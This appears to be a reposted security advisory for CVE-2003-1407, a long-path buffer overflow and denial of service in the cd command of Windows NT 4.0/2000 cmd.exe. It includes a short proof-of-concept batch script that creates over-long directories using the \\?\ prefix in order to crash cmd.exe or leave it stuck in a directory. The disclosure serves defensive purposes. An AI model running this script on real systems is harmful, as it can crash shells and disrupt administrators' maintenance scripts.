Windows NT 4.0/2000 cmd.exe long path buffer overflow/DoS

2007.10.20
Credit: 3APA3A
Risk: High
Local: Yes
Remote: No
CVE: CVE-2003-1407
CWE: CWE-119


CVSS Base Score: 7.2/10
Impact Subscore: 10/10
Exploitability Subscore: 3.9/10
Exploit range: Local
Attack complexity: Low
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

Title: Buffer overflow/DoS against cmd.exe for Windows NT 4.0/2000 Affected: Microsoft Windows NT 4.0 (buffer overflow) Microsoft Windows 2000 (DoS) Vendor: Microsoft Risk: Average for Windows NT 4.0 Low for Windows 2000 Exploitable: Yes Remote: No Vendor Notified: January, 30 2003 I. Intro cmd.exe is Windows NT OS family command processor. It's also used to process .bat and .cmd batch files. Many system administrator run batch files with elevated privileges for system maintenance. II. Vulnerability cmd.exe has a flow in processing cd command on long path name. On Windows NT 4.0 it may cause buffer overflow, on Windows 2000 - failure of batch file processing. III. Details NTFS file system allows to create paths of almost unlimited length. But Windows API does not allow path longer than 256 bytes. To prevent Windows API from checking requested path \\?\ prefix may be used for filename. This is documented feature of Windows API. cmd.exe from Windows NT 4.0 has trivial buffer overflow in CD command if destination path is longer than 256 characters. This vulnerability may be trivially exploited to execute code. cmd.exe from Windows 2000 has no buffer overflow, but than changing to directory with a path slightly longer than 256 characters (for example 260 characters) cmd.exe becomes "jailed" in this directory, it means cd .. command will fail. It may cause DoS against maintenance batch script. IV. Exploitation @echo off SET A=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA SET B=BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB mkdir \\?\c:\%A% mkdir \\?\c:\%A%\%A% mkdir \\?\c:\%A%\%B%c: cd cd AAAAAAAAAAAA* cd AAAAAAAAAAAA* cd BBBBBBBBBBBB* cd .. creates directory with 2 subdirectory. First one demonstrates buffer overflow on Windows NT 4.0 (second cd AAAAAAAAA* command will crash cmd.exe with EIP overwritten) second one demonstrates cmd.exe to change directory to AA...\BB..., but cd .. command will fail. V. Vendor Microsoft acknowledged problem. -- http://www.security.nnov.ru /\_/ { , . } |+--oQQo->{ ^ }<-----+ | ZARAZA U 3APA3A } +-------------o66o--+ / |/ You know my name - look up my number (The Beatles)


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top